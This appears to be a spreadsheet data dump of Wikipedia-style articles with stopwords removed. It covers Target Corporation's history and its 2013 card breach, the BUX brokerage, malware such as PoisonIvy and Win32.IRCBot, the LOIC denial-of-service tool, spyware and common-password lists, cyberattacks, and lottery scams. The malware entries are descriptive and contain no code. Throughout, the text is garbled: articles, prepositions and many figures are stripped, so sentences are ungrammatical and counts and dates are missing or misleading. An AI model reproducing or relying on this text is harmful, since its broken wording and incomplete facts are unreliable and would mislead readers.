2008, ulrich announced plans retire ceo, named gregg steinhafel successor. ulrich's retirement target corporation policy requiring high-ranking officers retire while retirement effective remained chairman board 2008 fiscal year. march 2009, target expanded outside continental united states first time. stores opened simultaneously island oahu hawaii, along stores alaska. despite economic downturn, media reports indicated sizable crowds brisk sales. opening hawaii stores left vermont state target operate. june 2010, target announced goal give billion education causes charities 2015. target school library makeovers featured program initiative. august 2010, "lengthy wind-down", target began nationwide closing remaining garden centers, reportedly "stronger competition home-improvement stores, walmart independent garden centers". september 2010, numerous target locations began adding fresh produce department stores.in 2007, target built first food distribution center lake city, florida, opened 2008. 2011–2015: initiatives, canada data breach january 2014, target "informed workers terminating positions offices globally." march 2014, target corp.'s chief information officer beth jacob resigned, role since 2008; thought company's overhaul information security systems.on june 2015, health announced agreement acquire target's pharmacy retail clinic businesses. deal expanded markets seattle, denver, portland salt lake city. acquisition includes 1,660 pharmacies states. operate store-within-a-store format. target's nearly clinic locations rebranded minuteclinic, plans open clinics stores within three years.in july 2015, company opened target open house, retail space francisco shows connected home products purchased select target stores. space, located metreon shopping center, adopts layout house show real world cases showcased products. addition, space hosts interviews company founders products display store. target canada january 2011, target announced expansion canada, purchased leaseholds stores canadian sale chain zellers, owned hudson's company. deal announced made billion dollars. company stated aimed provide canadians "true target-brand experience", hinting product selection canada would vary little found united states stores. target opened first canadian stores march, 2013, peak, target canada stores. however, expansion canada beset problems, including supply chain issues resulted stores aisles empty shelves higher-than-expected retail prices. target canada racked losses $2.1 billion short life, store's botched expansion characterized canadian media "spectacular failure", unmitigated disaster", gold standard case study retailers enter market."on january 2015, target announced canadian outlets would closed liquidated 2015. last target canada stores closed april 2015, ahead initial schedule. 2013 security breach december 2013, security expert brian krebs broke news target investigating major data breach "potentially involving millions customer credit debit card records." december target confirmed incident press release, revealing hack took place november december 2013. target warned million consumer credit debit cards compromised. hackers gained access customer names, card numbers, expiration dates, security codes cards issued financial institutions. december target disclosed debit card data also stolen, albeit encrypted form, reversing earlier stance data part breach. target noted accessed numbers encrypted using triple stated pins remain "safe secure" encryption. january 2014, target disclosed names, mailing addresses, phone numbers email addresses million additional people also stolen, bringing possible number customers affected million.according bloomberg businessweek, target's computer security team notified breach fireeye security service employed, ample time disrupt theft credit cards customer data, prevent theft carried out.target encouraged customers shopped stores (online orders affected) specified timeframe closely monitor credit debit cards irregular activity. retailer confirmed working enforcement, including united states secret service, bring responsible justice." data breach called second-largest retail cyber attack history, compared 2009 non-retail heartland payment systems compromise, affected million credit cards, 2007 retail companies compromise, affected million people. apology public, target stores united states gave retail shoppers storewide discount weekend december 21–22, 2013. target offered free credit monitoring experian affected customers. target reported total transactions time last year 3-4%, december 2013.according time magazine, 17-year-old russian teen suspected author point sale (pos) malware program, "blackpos", used others attack unpatched windows computers used target. teen denied allegation. later, 23-year-old russian, rinat shabayev, claimed malware author.on january 2014, target spokeswoman said individual(s) hacked customers' data stolen credentials store vendor, elaborate vendor credentials taken.as fallout data breach continued, march 2014, target announced resignation chief information officer overhaul information security practices. step restore faith customers, company advised look externally appointments role chief compliance officer role.on 2014, target announced resignation chief executive officer, gregg steinhafel. analysts speculated data breach, well financial losses caused over-aggressive canadian expansion, contributed departure. 2016–present october 2017, target announced online order service, known drive allows guests order merchandise online pickup outside store. guests 'i'm way' button route store. they pull designated parking spots front, soon target team member comes greet order.on october 2017, target announced opening small-format store first store vermont university mall south burlington october 2018. store replaced former bon-ton (originally almy's later steinbach), closed january 2018. december 2017, target announced corporation's intention purchase shipt, internet-based grocery delivery service reported $550 million. acquisition intended help same-day delivery better compete amazon. target announced february 2018 would shift sales model compact discs, dvds, blu-ray discs provide solely contingency basis, citing reduced physical media sales favor digital downloads streaming.in 2018, according yougov ratings target determined popular department store america. target rated positive opinions america, people heard women positive opinion towards target 65%.on weekend june 2019, large number target stores u.s., saturday shoppers experienced systems outage shut card readers check-out registers close hours. sunday, additional spot outages company says unrelated saturday’s problems." another—although much shorter—checkout register crash happened 2013, date saturday crash. september 2019, target announced rewards program, target circle, would coming target stores october 2019. conjunction, name store's credit debit card announced changed "target redcard" "target redcard." debut, target circle allows shoppers earn back rewards future purchase, except target redcard used. target redcard holders continue save instant total earn votes purchase target circle deciding target gives back community. target circle rewards program physical card, used presenting target wallet target entering mobile phone number checkout. august 2019, target walt disney company announced partnership disney store several target locations. disney store target locations "shop-in-shop" layout average square feet 750. kids target also announced partnership october 2019, relaunch website toys toysrus.com. when customer goes toysrus.com purchase product redirected target.com complete order. website allows toys online presence, bankruptcy, time adds boost target's sales toys.on march 2020, brian cornell (ceo) took part former president trump's address covid-19 pandemic. target, along competitors walmart, pharmacy, walgreens, would take part using stores testing covid-19. july 2020, target joined major retailers requiring customers wear masks u.s. stores.on march 2021, target 1249 simpson avenue salt lake city, utah opened, replaced nordstrom rack moved building used toys sugarhouse shopping centre closed 2016. also, target expanded roster exclusive owned brands addition mondo llama, favorite kindfull. target launched ulta beauty target deepened partnerships disney, apple levi strauss references</t>
  </si>
  <si>
    <t>BUX (brokerage)</t>
  </si>
  <si>
    <t>european mobile brokerage company, based amsterdam london. retail investors shares, etfs cryptocurrency commission-free zero app. offers trading crypto trading crypto platform. history founded july 2013 nick bortot, former executive dutch online broker binckbank. initial funding came founders orange growth capital.the company launched first september 2014 netherlands several months later based trading.in september 2015, raised €1,700,000 american/british venture investor initial capital. february 2016, raised another us$6,900,000 holtzbrinck ventures, existing shareholders orange growth capital velocity capital. also february 2016, became available germany.in 2016 company "accenture innovation awards". also wired included company "europe's hottest startups 2016" list. october 2016, company removed stores belgium month launch, local prohibiting commercialization leveraged cfds.in january 2017, launched italy. october 2017, firm raised another €10,600,000 existing shareholders, holtzbrinck ventures velocity capital management, well number private investors (such arthur kosten, former booking.com, binckbank founder thierry schaap founder mollie nl:adriaan mol). also launched crowdfunding campaign seedrs, raised additional €1,400,000.by november 2018, million users european countries.in 2019, partnered amro bank’s blockchain-based technology zero-commission investing app.in june 2019, firm raised us$12,500,000 venture capital funds. some money towards acquiring ayondo markets limited (aml), subsidiary singapore-based broker ayondo, deal estimated £5,700,000. also june 2019, renamed x.in september 2019, named zero, launched netherlands. june 2020, launched germany austria month later france. august 2020, became available belgium.in january 2020, acquired blockport, european cryptocurrency exchange. firm registered dutch central bank, rebranded launched crypto april 2020. products zero app, launched september 2019, allows users trade european stocks exchange-traded funds zero commission. financial services provided b.v. regulated netherlands authority financial markets. october 2020, zero available netherlands, germany, austria, france, belgium.the revenue company generated commission market limit orders, however invented order type, called zero order, free charge. future, also generate revenue securities lending, e.g. lending shares held custody collateral. however, service live. statement company says "you become client explicitly given approval lending your financial instruments. lending your financial instruments achieve return bux, make possible offer certain services free charge keep costs possible you." launched september 2014, trading, amidst criticism trading complicated risky consumers. service provided financial services limited, regulated financial conduct authority. september 2019, available netherlands, germany, austria, italy, spain, france, sweden denmark. references external links official website</t>
  </si>
  <si>
    <t>PoisonIvy (trojan)</t>
  </si>
  <si>
    <t>poisonivy remote access trojan enables logging, screen capturing, video capturing, file transfers, system administration, password theft, traffic relaying. created around 2005 chinese hacker used several prominent hacks, including breach securid authentication tool nitro attacks chemical companies, 2011. another name malware "backdoor.darkmoon". references</t>
  </si>
  <si>
    <t>Maksim Yakubets</t>
  </si>
  <si>
    <t>maksim viktorovich yakubets (russian: максим викторович якубец) russian computer expert alleged computer hacker. alleged member evil corp, jabber zeus crew, well alleged leader bugat malware conspiracy. russian media openly describe yakubets "hacker stole $100 million", friend dmitry peskov discussed lavish lifestyle, including luxury wedding daughter officer eduard bendersky lamborghini "вор" (russian "thief") registration plate. yakubets impunity russia perceived clue close ties fsb, also criticized domestic information security experts ilya sachkov. references</t>
  </si>
  <si>
    <t>Polar Rose (facial recognition)</t>
  </si>
  <si>
    <t>polar rose company malmö, sweden made facial recognition software. polar rose service allows users name people photos photo sharing sites like flickr 23hq.com using facebook contacts. using facial recognition polar rose applied auto-tagging users. service discontinued september 2010 purchased weeks later apple inc. estimated $25-29 million.the polar rose website related add-ons firefox internet explorer allowed users names faces people whose photographs appear web, find pictures individuals; however, 2009, plugins discontinued favor purely web-based interface.search wikia featured integration polar rose.polar rose founder erik solem company danish serial entrepreneur nikolaj nyholm ceo. after acquisition apple, solem moved california worked apple 2013.polar rose awarded world economic forum technology pioneer award 2008 awards like sime's 2007 best technical innovation herring global list 2007. references</t>
  </si>
  <si>
    <t>2013 Singapore cyberattacks</t>
  </si>
  <si>
    <t>2013 singapore cyberattacks series cyberattacks initiated hacktivist organisation anonymous, conducted partly response censorship regulations singapore. member anonymous, known online handle "the messiah", claimed responsibility spearheading attacks. november 2013, james charged singapore court alleged "messiah". background june 2013, censorship regulations drafted media development authority became effective singapore. under rules, websites least 50,000 unique visitors singapore every month publish least local news article week period months remove 'prohibited content' articles undermine 'racial religious harmony' within hours notified singapore's media regulator. response concerns regarding rules, government officials responded impinge internet freedom". incidents october 2013, attacks began people's action party's community foundation's webpage hacked, followed official website town council. site administrators locked site thereafter police report made.two days later, purported member anonymous uploaded four-minute-long video youtube, wearing fawkes mask, threatened "bring infrastructure singapore". also urged singaporeans black november well black facebook profile pictures. video, made reference messiah, called "one [anonymous'] comrades".the straits times news reporter irene tham posted critique video newspaper blog. retaliation, messiah defaced blog, title changed "dear [straits times]: hacked misleading people!". messiah edited article state tham misconstrued speech, "conveniently modifying sentence 'war singapore government' 'war singapore'." also urged tham either apologise within days resign result "blasphemous lies". later email yahoo singapore, messiah said reached comrades fractions [sic] together performed poisoning .gov.sg sites, taking period time. must also patching done favourite point entries networks seemed fixed. november, website seletar airport hacked. webpage replaced black green background image middle resembling skull wearing hood. site resumed normal operations minutes hack first noticed.on november, twitter youtube accounts singaporean entertainer ridhwan azman hacked. according posts compromised account, retaliation "dissing legion". apart incident, anonymous carry major activity, contrary promise ignite massive protest date.two days later, hacktivists hacked vandalised subpage website singapore prime minister hsien loong, following lee's bring messiah accomplices justice. later found mohammad azhar tahir mohammad asyiq tahir responsible attacks. additionally, webpage istana hacked.on november, websites schools, hosted single server, reportedly defaced 3:30pm 5pm. reception news cyberattacks picked international news outlets, including south china morning post, huffington post, time, star, jakarta post.regarding hacking town council's website, member parliament dubbed "malicious", promising boost page's security system.after release youtube video, government security incident response team immediately released alert singaporean government agencies. infocomm development authority singapore responded official statement, aware video, police investigating matter." singapore press holdings (sph), straits times subsidiary, promptly took blog hacked filed complaint police.singaporean politician deputy chairman singapore's parliamentary committee communications information, baey keng, offered, know hacker's capabilities are, important take seriously." bertha henson, operates breakfast network, singaporean news outlet, felt messiah's action would "make government seem right, [independent website operators] troublemakers."prime minister hsien loong pledged hunt team responsible cyberattack, stating, laughing matter. it's anything goes, anonymous, therefore there's responsibility. think anonymous. make extra effort find are."the cyberattacks featured tenth episode 2015 season crimewatch. also timeline events associated anonymous references external links anonymous' message singapore government youtube</t>
  </si>
  <si>
    <t>Backblaze</t>
  </si>
  <si>
    <t>backblaze, inc. american cloud storage data backup company, founded 2007 gleb budman, billy nilay patel, brian wilson, nufire, damon uyeda, casey jones. main products cloud storage computer backup services, targeted business personal markets. products cloud backup backblaze's first product computer backup, offering users back computer data continuously automatically monthly subscription service. service makes encryption security, uses data compression bandwidth optimization reduce upload download times. files need restored delivered form digital download external hard drive. file versioning history available, however days additional cost month. backblaze cloud storage september 2015, backblaze launched product, cloud storage. being infrastructure service (iaas), targeted software integration different kinds businesses. directly competes similar services, amazon microsoft azure google cloud. april 2018, backblaze announced cloud computing partnerships directly connect backblaze's data centers partners, packet servercentral. technology data centers backblaze four data centers; three united states europe. u.s. data centers northern california near sacramento, phoenix, arizona. backblaze's data center european union located amsterdam, netherlands. redundancy order increase redundancy, data uploaded onto backblaze's data center sharded data pieces three parity shards file. parity shard bits computed reed–solomon error correction algorithm. shards stored different drives, separate cabinet increase resilience power loss entire cabinet, physically-based issue. backblaze states 'vault' architecture designed 99.999999999% annual durability. encryption computer backup, backblaze uses combination encryption protect user data. data stored backblaze storage using reed-solomon erasure coding encrypted user's private key, secured user's password username. default encryption private keys done server side, unlikely protect government subpoena serious data breach. users desiring additional security privacy optional private encryption (pek), passphrase sent server initially set, must sent restore data.encryption storage handled entirely user client software manage stored data, making immune government subpoena data breach protecting data transfer ultimate storage backblaze's data centers. storage open design 2009 2011, company released drawings computer case used storage servers datacenters. with commercial off-the-shelf components processors, disks, motherboards, high-density storage servers built lower cost commercial ones. company since made iterations design years. references external links official website forbes: backblaze undercuts cloud storage competitors (2015) register: interview backblaze gleb budman (2018) fortune magazine: amazon, google, microsoft aren't only cloud innovators around (2017) review sweet setup (2017) review macworld magazine (2009) archived march 2012 wayback machine review washington post (2008)</t>
  </si>
  <si>
    <t>Backdoor.Win32.IRCBot</t>
  </si>
  <si>
    <t>backdoor.win32.ircbot (also known w32/checkout (mcafee), w32.mubla (symantec), w32/ircbot-wb (sophos), backdoor.win32.ircbot.aaq (bydoon center)) backdoor computer worm spread messenger windows live messenger. once installed worm copies windows system folder, creates file displayed "windows genuine advantage validation notification" becomes part computer's automatic startup. addition, attempts send contacts offering attachment named 'photos.zip'. executing file install worm onto local win32.ircbot worm provides backdoor server allows remote intruder gain access control computer internet relay chat channel. this allows confidential information transmitted hacker. because lack standard naming conventions also common features, variants win32.ircbot often confused agobot spybot family worms. example, sophos lists backdoor.win32.ircbot.ul, w32/poebot-jt worm, win32/ircbot.ts aliases w32/gaobot.worm.gen.e worm, member agobot family. also internet relay chat comparison internet relay chat bots malware botnet trojan horse (computing) references</t>
  </si>
  <si>
    <t>MacOS malware</t>
  </si>
  <si>
    <t>macos malware includes viruses, trojan horses, worms types malware affect macos, apple's current operating system macintosh computers. macos (previously said rarely suffer malware virus attacks, considered less vulnerable windows. there frequent release system software updates resolve vulnerabilities. utilities also available find remove malware. history early examples macos malware include leap (discovered 2006, also known oompa-loompa) rsplug (discovered 2007). application called macsweeper (2009) misled users malware threats order take credit card details. trojan macdefender (2011) used similar tactic, combined displaying popups. 2012, worm known flashback appeared. initially, infected computers fake adobe flash player install prompts, later exploited vulnerability java install without user intervention. malware forced oracle apple release fixes java remove vulnerability. bit9 carbon black reported 2015 malware prolific year ever before, including: lamadai java vulnerability appetite trojan horse targeting government organizations coin thief stole bitcoin login credentials cracked angry birds applicationsa trojan known keydnap first appeared 2016, placed backdoor victims' computers. 2021 cybercriminals found attack victims suspicious online ad's. thread affects notifications events. this term described calendar virusadware also problem mac, software like genieo, released 2009, inserting webpages changing users' homepage search engine. malware also spread macs microsoft word macros. ransomware march 2016 apple shut first ransomware attack targeted users, encrypting user's confidential information. known keranger. after completing encryption process, keranger demanded victims bitcoin (about us$400 time, us$51,801.90 february 2021) user recover credentials. references</t>
  </si>
  <si>
    <t>MacMag</t>
  </si>
  <si>
    <t>macmag virus, also known various names, computer virus introduced 1988 richard brandow, time editor publisher macmag computer magazine montréal. operation virus virus infected macintosh computers, intention march 1988 infected computers would show message "richard brandow, publisher macmag, entire staff would like take opportunity convey universal message peace macintosh users around world", virus would delete itself. according virus itself, written drew davidson. virus boot sector virus, spread form hypercard stack called "new apple products," contained poor pictures then-new apple scanner. copied resource system folder mac, "initial" program, would automatically every time system started program copied onto bootable disk opened. damage caused brandow intended virus benign, giving friendly message causing harm. however virus caused infected computers undergo system crashes date. another bug, affected users, caused files original virus deleted termination stage. also caused great deal anxiety among users found computers infected unwanted program nature unknown. virus infected aldus corporation's freehand, aldus recall thousands copies freehand, leading threaten legal action. brandow's attitudes virus brandow persistently called "author" virus, fact write commissioned written, virus internally contained name "drew davidson". never apologized, always indicated proud action. when confronted users adversely affected virus used reply argument level handgun ownership united states. references</t>
  </si>
  <si>
    <t>List of password managers</t>
  </si>
  <si>
    <t>list includes names notable password managers dedicated wikipedia articles. basic information features also password manager password fatigue references bibliography neil rubenking (february 2020). "the best password managers 2020". magazine. pogue, david (june 2013). "remember those passwords? need". york times. retrieved december 2019.</t>
  </si>
  <si>
    <t>MacKeeper</t>
  </si>
  <si>
    <t>mackeeper utility software distributed clario tech limited. mackeepers developed zeobit presently distributed clario tech. first beta version released 2010. designed operate computers running macos. versions received mixed reviews, version released 2015 reviewed mostly negatively according macworld difficult uninstall. latest version released 2020 clario tech acquired kromtech’s mackeeper 2019 relaunched software. history mackeeper initially developed 2009 ukrainian programmers zeobit. first beta version, mackeeper 0.8, released 2010. mackeeper released october 2010. mackeeper released january 2012 macworld iworld expanded number utilities related security, data control, cleaning optimization. kromtech alliance acquired mackeeper zeobit april 2013. mackeeper released june 2014 software service "human expert" feature optimization yosemite. july 2018, mackeeper released.in april 2013, zeobit sold mackeeper kromtech alliance corp. kromtech closely affiliated zeobit ukraine hired many former kyiv-based zeobit employees. december 2015 security researcher chris vickery discovered publicly accessible database 21gb mackeeper user data internet, exposing usernames, passwords information million mackeeper users. according kromtech, result "server misconfiguration" error "fixed within hours discovery".in 2019 clario acquired human capital kromtech, including mackeeper.as 2019, five major versions mackeeper released. features integrates avira's anti-malware scanning engine, versions opened critical security hole. filesystem-level encryption tool encrypt files folders password. data recovery utility permits users recover unintentionally deleted files. backup software also included, copy files flash drive, external server. data erasure permits users permanently delete files although world argues feature duplicates secure empty trash feature formerly built macos. disk cleaner finds removes junk files hard drive order free space. reception version earlier bundles received mixed reviews, reviewers divided effectiveness software. macworld gave mackeeper stars august 2010, based 0.9.6 build program, found reasonably priced tools experienced lagging switching tools. maclife rated said useful mainly freeing drive space, found features offered inconsistent results believed users won’t need antivirus feature. av-comparatives found mackeeper excellent ability detect mac-based malware. they noted "very well suited enthusiasts good understanding security issues, ideal non-expert users need pre-configured optimal security macs." zeobit claims negative attacks launched mackeeper unnamed competitor, many users press confusing mackeeper another application. version reviews latest software version largely negative. 2015 test world found mackeeper identified need extensive corrections brand fully patched machines. december 2015, business insider imore suggested users avoid product install reviews removed mackeeper ranking noting software features competitors performance malware identification tests showed software better detection rates, resulting score july 2017 av-test assessment found mackeeper detected 85.9 percent tested malware.mackeeper criticized difficult uninstall; according macworld, people frequently mackeeper. both tom's guide macworld published how-to guides deleting software. macworld observed aggressive mackeeper advertising leads people believe software either malware scam, neither; macworld also notes pop-up pop-under third-party installers. computerworld described mackeeper virulent piece software promises cure woes, instead makes things much worse". version mackeeper released july 2018. included improvements anti-tracking, macos combination security, privacy, anti-fraud technologies. version mackeeper 5.0., released november 2020, notarized apple av-tested.according macobserver version security certifications allowed low-level system privilege hardware. techradar rated mackeeper 5.0. product decent level protection performance optimization features".mackeeper 5.0. following major tools: find one-click scan review status antivirus real-time protection theft guard detects data breaches password leaks stopad block chrome safari safe cleanup detect remove unneeded attachments files duplicates finder spot duplicate files sort similar photos screenshots marketing techniques multiple reviewers criticized zeobit's marketing promotional techniques. kromtech buys upwards million impressions month, making largest buyers traffic aimed users. zeobit accused employing misleading advertising regard promotion mackeeper, including aggressive affiliate marketing, pop-under planting sockpuppet reviews well websites discredit competitors. kromtech also issues affiliate advertisers, attracted percent commissions kromtech pays sales mackeeper, wrapped mackeeper adware. 2018, kromtech began take steps affiliate marketers said scamming users. company recovered changing management. lawsuits january 2014, class action lawsuit filed zeobit illinois. lawsuit alleged "neither free trial full registered versions mackeeper performed credible diagnostic testing" reported consumer's need repair at-risk harmful error. 2014 lawsuit filed zeobit pennsylvania, alleging mackeeper fakes security problems deceive victims paying unneeded fixes. august 2015, zeobit settled class action lawsuit us$2 million. customers bought mackeeper july 2015 apply refund.kromtech also filed least unsuccessful lawsuits perceives defaming them. july 2013 kromtech filed lawsuit macpaw, developers cleanmymac. kromtech alleged macpaw employees created several usernames posts several websites defaming mackeeper software. case dismissed hearing. year later, 2014, kromtech filed lawsuit david alleging defamed kromtech calling mackeeper fraudulent application youtube video. judge dismissed case lack personal jurisdiction. july 2016, kromtech sent cease desist letter luqman wadood, 14-year technology reviewer alleged harassment slander mackeeper brand number youtube videos. luqman said videos diplomatic. also comparison antivirus software comparison firewalls internet security references</t>
  </si>
  <si>
    <t>Luas cyberattack</t>
  </si>
  <si>
    <t>january 2019 website luas compromised message threatening "publish data send emails users" unless bitcoin paid five days. time attack bitcoin worth €3,385. response luas operator transdev took site offline thursday january 2019. that afternoon said records affected people signed luas newsletter people would contacted next hours inform breach. financial records compromised. data protection commissioner garda national economic crime bureau notified attack. references</t>
  </si>
  <si>
    <t>List of spyware programs</t>
  </si>
  <si>
    <t>this list spyware programs. these common spyware programs illustrate diversity behaviours found attacks. note computer viruses, researchers give names spyware programs used creators. programs grouped "families" based shared program code, common behaviors, "following money" apparent financial business connections. instance, number spyware programs distributed claria collectively known "gator". likewise, programs frequently installed together described parts spyware package, even function separately. spyware programs coolwebsearch, group programs, takes advantage internet explorer vulnerabilities. package directs traffic advertisements sites including coolwebsearch.com. displays pop-up ads, rewrites search engine results, alters infected computer's hosts file direct lookups sites. finfisher, sometimes called finspy high-end surveillance suite sold enforcement intelligence agencies. support services training technology updates part package. keyboard, virtual android keyboard apps keyboard emoji keyboard keyboard emoticon keyboard), transmit personal information remote servers without explicit users' consent. this information includes user's google account email, language, imsi, location, network type, android version build, device's model screen size. apps also download execute code remote server, breaching malicious behavior section google play privacy policies. some plugins detected adware many anti-virus engines, developer, chinese company gomo team, claims apps' description never collect personal data including credit card information. apps million users total caught spying september 2017 security researchers adguard reported findings google. hermit toolkit developed government agencies android mobile phones. huntbar, wintools adware.websearch, installed activex drive-by download affiliate sites, advertisements displayed spyware programs—an example spyware install spyware. these programs toolbars track aggregate browsing behavior, redirect affiliate references, display advertisements. internet optimizer, also known dyfuca, redirects internet explorer error pages advertising. when users follow broken link enter erroneous url, page advertisements. however, password-protected sites (http basic authentication) mechanism http errors, internet optimizer makes impossible user access password-protected sites. spyware look2me hides inside system-critical processes start even safe mode. with process terminate harder detect remove, combination spyware rootkit. rootkit technology also seeing increasing use, newer spyware programs also specific countermeasures well known anti-malware products prevent running installed, even uninstall them. movieland, also known moviepass.tv popcorn.net, movie download service subject thousands complaints federal trade commission (ftc), washington state attorney general's office, better business bureau, agencies. consumers complained held hostage cycle oversized pop-up windows demanding payment least $29.95, claiming signed three-day free trial cancelled trial period over, thus obligated pay. filed complaint, since settled, movieland eleven defendants charging "engaged nationwide scheme deception coercion extract payments consumers." onavo protect used facebook monetize usage habits within privacy-focused environment, criticized listing contain prominent disclosure facebook's ownership. removed apple store apple deemed violation guidelines barring apps harvesting data apps user's device. pegasus spyware android mobile phones developed group received widespread publicity government agencies. zwangi redirects urls typed browser's address search page www.zwangi.com, also take screenshots without permission. programs distributed spyware kazaa morpheus weatherbug wildtangent programs formerly distributed spyware instant messenger (aol instant messenger still packages viewpoint media player, wildtangent) divx flashget magicjack references</t>
  </si>
  <si>
    <t>List of the most common passwords</t>
  </si>
  <si>
    <t>this list common passwords, discovered various data breaches. common passwords generally recommended account password strength. list nordpass nordpass conducted breached passwords research 2021. company gathered worst passwords year database 275,699,516 passwords. splashdata worst passwords list annual list common passwords year produced internet security firm splashdata. since 2011, firm published list based data examined millions passwords leaked data breaches, mostly north america western europe, year. 2016 edition, common passwords made surveyed passwords, common password 2016, "123456", making keeper password manager keeper compiled list common passwords 2016, million passwords leaked data breaches year. national cyber security centre national cyber security centre (ncsc) compiled list common passwords 2019, million passwords leaked data breaches year. also password cracking 10,000 common passwords notes references external links skullsecurity list breached password collections</t>
  </si>
  <si>
    <t>BerkShares</t>
  </si>
  <si>
    <t>berkshares local currency circulates berkshires region massachusetts. launched september 2006 berkshares inc., research development assistance schumacher center economics. berkshares website lists around businesses berkshire county accept currency. since launch, million berkshares issued participating branch offices local banks february 2020, branches different banks). bills designed john isaacs printed excelsior printing special paper incorporated security features crane berkshares pegged exchange rate dollar, schumacher center discussed possibility pegging value basket local goods order insulate local economy volatility economy. berkshares local currency designed issued berkshire region massachusetts. according berkshares website, residents purchase berkshares cents (usd) berkshare sixteen branches four local participating banks. businesses accept berkshares full dollar value, differentiating business supporting berkshares values local economy, ecology, sustainability, community, creating five percent discount incentive using currency. berkshares used accepting businesses purchase goods services participating businesses, make change, salaries, support local non-profits, increasing local economic multiplier effect keeping value recirculating region. businesses excess berkshares, also returned participating bank equivalent rate cents berkshare (i.e., charging exchange fee). over locally-owned businesses currently accept berkshares donations. four participating banks provide berkshares brick-and-mortar offices residents exchange dollars berkshares receive information project. denominations berkshares printed berkshare denominations, feature images local people. berkshare note uses portrait mahican, original inhabitants area. berkshare note uses portrait bois, civil rights leader born great barrington. berkshare note uses portrait robyn co-founder community supported agriculture movement indian line farm south egremont, massachusetts, died 1997. berkshare note uses portrait herman melville, author moby-dick, written pittsfield, massachusetts. berkshare note uses portrait norman rockwell, painter lived stockbridge, massachusetts purpose berkshares program seeks foster collaboration among producers, retail businesses, non-profit organizations, service providers consumers. attempt strengthen local economy. program also seeks increase public awareness importance local economies foster optimism prospect gaining local economic self-sufficiency. emulation media attention number local currency initiatives, dáanaa, totnes pound, lewes pound, developed built upon berkshares model.the berkshares currency attracted international media attention. york times, times, news hour, world news, cbs, bbc, cnn, nbc, cnbc, reuters, french television tf1, russia, business week, associated press, yahoo news carried prominent stories berkshares. berkshares featured history channel program things know, addition 2016 episode podcast stuff should know entitled live without bank account? taxation when someone pays goods services local money, income business taxable. similar gift cards, applicable taken time purchase paid time redemption merchant. also list community currencies united states references further reading stephanie (february 2007). "making money: town prints currency". news. archived original january 2016. retrieved september 2013. bello, marisol (april 2009). "communities print currency keep cash flowing". today. archived original october 2014. retrieved september 2013. schwartz, judith (july 2009). "tough times lead local currencies". time. retrieved september 2013. solman, paul (september 2013). "how print dollars your backyard keep them away wal-mart". pbs. retrieved september 2013. external links website berkshares, inc. issuing organization berkshares</t>
  </si>
  <si>
    <t>2008 cyberattack on United States</t>
  </si>
  <si>
    <t>2008 cyberattack united states malicious attack done foreign actors united states department defense. described time "worst breach u.s. military computers history", defense attack named "operation buckshot yankee". creation united states cyber command. history started flash drive infected foreign intelligence agency left parking department defense facility base middle east. contained malicious code port laptop computer attached united states central command. from spread undetected systems, classified unclassified. operation buckshot yankee pentagon spent nearly months cleaning worm, named agent.btz, military networks. agent.btz, variant sillyfdc worm, ability scan computers data, open backdoors, send backdoors remote command control server." suspected chinese russian hackers behind used code made agent.btz previous attacks. order stop spread worm, pentagon banned drives, disabled windows autorun feature. references further reading nakashima, ellen; julie tate 2011), "cyber-intruder sparks massive federal response debate dealing threats", washington post, washingtonpost.com, retrieved 2011, this article, contains previously undisclosed information extent infection, nature response fractious policy debate inspired, based interviews dozen current former u.s. officials others knowledge operation.</t>
  </si>
  <si>
    <t>Low Orbit Ion Cannon</t>
  </si>
  <si>
    <t>orbit cannon (loic) open-source network stress testing denial-of-service attack application written loic initially developed praetox technologies, however later released public domain currently available several open-source platforms. loic performs attack (or, used multiple individuals, ddos attack) target site flooding server tcp, udp, http packets intention disrupting service particular host. people used loic join voluntary botnets.the software inspired creation independent javascript version called loic, well loic-derived version called orbit cannon. these enable browser. countermeasures security experts quoted indicated well-written firewall rules filter traffic ddos attacks loic, thus preventing attacks fully effective. least instance, filtering icmp traffic blocked loic attack. firewall rules sort likely effective implemented point upstream application server's internet uplink avoid uplink exceeding capacity.loic attacks easily identified system logs, attack tracked addresses used. notable uses project chanology operation payback loic used anonymous group spawned board 4chan) project chanology attack websites church scientology, (successfully) attack recording industry association america's website october 2010, used anonymous operation payback december 2010 attack websites companies organizations opposed wikileaks. operation megaupload retaliation shutdown file sharing service megaupload arrest four workers, members anonymous launched ddos attack upon websites universal music group (the company responsible lawsuit megaupload), united states department justice, united states copyright office, federal bureau investigation, mpaa, warner music group riaa, well hadopi, afternoon january 2012, loic. general, attack hoped retaliate anonymous members believed harmed digital freedoms. origin name loic application named cannon, fictional weapon many sci-fi works, video games, particular namesake command conquer series. artwork used application concept command conquer tiberium wars. legality while downloading using loic one's personal servers means stress-testing perfectly legal, least united states, using program perform ddos attack parties could considered felony computer fraud abuse 1986. this charge could result years imprisonment, fine both. also fork bomb high orbit cannon land ping death redos zemra white (computer security) references external links original loic professional loic special lowbandwidth operating weapon improved version lowc forked googlecode loic irc-0 controlled version loic-0 loic slow with webpage project development downloads sourceforge loic project development downloads github version loic google code</t>
  </si>
  <si>
    <t>Lottery scam</t>
  </si>
  <si>
    <t>lottery scam type advance-fee fraud begins unexpected email notification, phone call, mailing (sometimes including large check) explaining "you won!" large money lottery. recipient message—the target scam—is usually told keep notice secret, "due mix-up names numbers," contact "claims agent." after contacting agent, target scam asked "processing fees" "transfer charges" winnings distributed, never receive lottery payment. many email lottery scams names legitimate lottery organizations legitimate corporations/companies, mean legitimate organizations involved scams. identification there several ways identifying fake lottery email: unless someone bought ticket, cannot prize. there things "email" draws lottery tickets sold". this simply another invention scammer make victims believe won. scammer victims advance receive prize. genuine lotteries simply subtract fees prize. regardless scammer claims (such courier charges, bank charges, various imaginary certificates), fabricated scammer obtain money victims. scam lottery emails nearly always come free email accounts outlook, yahoo!, hotmail, live, msn, gmail etc. scam emails often insist recipient keep confidential; done avoid others advising email scam. there often inconsistencies currencies countries, example message sent individual lives claiming amount dollars lottery based south africa. vast majority scam email messages general, lottery scam messages often contain spelling and/or grammatical issues.most email lottery scams type advance fraud. mis-selling lottery "win" another type lottery scam scam email page recipient money lottery. recipient instructed contact agent quickly scammers using third party company, person, email names hide true identity, cases offering extra prizes (such day/6 night bahamas cruise vacation, user rings within minutes). after contacting "agent", recipient asked come office, hour more, conditions receiving offer revealed. example, prize recipient encouraged spend much times prize money order receive prize itself. words, although offer fact genuine, really discount percent extremely expensive purchase. this type scam legal many jurisdictions. sometimes lottery scam messages sent ordinary postal mail; content style similar e-mail versions. example, scams letter misuse names legal spanish lotteries, gordo primitiva.in number legitimate lottery sites dedicated pages subject scams. blackmail variation this variation relies target agreeing accept money know entitled then, refuse advance fee, scammers threaten report unless blackmail paid. typical 